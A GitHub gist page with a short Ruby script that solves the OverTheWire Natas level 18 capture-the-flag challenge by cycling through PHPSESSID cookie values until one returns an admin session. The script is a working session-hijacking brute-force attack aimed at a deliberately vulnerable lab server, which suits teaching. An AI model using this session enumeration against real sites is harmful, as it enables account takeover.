Skip to content

Instantly share code, notes, and snippets.

@dlanner

dlanner/brute_force_session.rb

Created April 25, 2014 01:07
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save dlanner/11274789 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save dlanner/11274789 to your computer and use it in GitHub Desktop.
Download ZIP
Script to brute force session id for Natas CTF Level 18
Raw
brute_force_session.rb
# Script to brute force session id for Natas CTF Level 18
# http://natas18.natas.labs.overthewire.org/
require 'net/http'
def find_password
raise ArgumentError, "Password required." unless ENV['NATAS18_PASSWORD']
max_id = 640
(1..max_id*3/2).each do |i|
puts "Trying session id #{i}"
uri = URI("http://natas18.natas.labs.overthewire.org/")
query = {
"debug" => true
}
uri.query = URI.encode_www_form( query )
req = Net::HTTP::Get.new(uri)
req.basic_auth 'natas18', ENV['NATAS18_PASSWORD']
req['Cookie'] = "PHPSESSID=#{i}"
res = Net::HTTP.start(uri.hostname, uri.port) { |http|
http.request(req)
}
puts res.body if res.body.include? "You are an admin."
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment